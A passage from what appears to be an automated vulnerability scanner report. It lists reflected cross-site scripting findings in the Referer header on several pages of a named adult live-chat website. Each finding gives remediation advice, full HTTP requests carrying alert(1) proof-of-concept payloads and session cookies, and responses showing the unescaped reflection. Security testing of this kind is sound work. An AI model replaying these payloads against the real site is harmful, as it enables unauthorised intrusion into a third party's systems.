Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=375ba'-alert(1)-'7a67cb13099

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 33567
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/&rf=http://www.google.com/search?hl=en^q=375ba'-alert(1)-'7a67cb13099&qs=cat=1^roomid=52&qs=cat=1^roomid=52&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.964. http://imlive.com/live-sex-chats/gay/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ca5e'-alert(1)-'e9dfbf1b8ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=2ca5e'-alert(1)-'e9dfbf1b8ea

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:34 GMT
Connection: close
Content-Length: 195039
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ript type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/&rf=http://www.google.com/search?hl=en^q=2ca5e'-alert(1)-'e9dfbf1b8ea&qs=cat=1^roomid=53&qs=cat=1^roomid=53&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.965. http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ad47'-alert(1)-'76a1a657857 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/guy-alone/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5ad47'-alert(1)-'76a1a657857

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:48 GMT
Connection: close
Content-Length: 69840
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/&rf=http://www.google.com/search?hl=en^q=5ad47'-alert(1)-'76a1a657857&qs=cat=1^roomid=54&qs=cat=1^roomid=54&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.966. http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1502'-alert(1)-'6f19a081c72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/happyhour/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=d1502'-alert(1)-'6f19a081c72

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:43 GMT
Connection: close
Content-Length: 22380
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/&rf=http://www.google.com/search?hl=en^q=d1502'-alert(1)-'6f19a081c72&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.967. http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b461'-alert(1)-'6f4815116d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8b461'-alert(1)-'6f4815116d3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:22 GMT
Connection: close
Content-Length: 118812
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/&rf=http://www.google.com/search?hl=en^q=8b461'-alert(1)-'6f4815116d3&qs=cat=1^roomid=191&qs=cat=1^roomid=191&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.968. http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7026c'-alert(1)-'0aae3d52806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=7026c'-alert(1)-'0aae3d52806

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:47 GMT
Connection: close
Content-Length: 32900
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/&rf=http://www.google.com/search?hl=en^q=7026c'-alert(1)-'0aae3d52806&qs=cat=1^roomid=11&qs=cat=1^roomid=11&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.969. http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff204'-alert(1)-'8fd9da9f013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/live-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ff204'-alert(1)-'8fd9da9f013

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:25 GMT
Connection: close
Content-Length: 25009
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/&rf=http://www.google.com/search?hl=en^q=ff204'-alert(1)-'8fd9da9f013&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.970. http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bd48'-alert(1)-'6c03af217a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/nude-chat/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
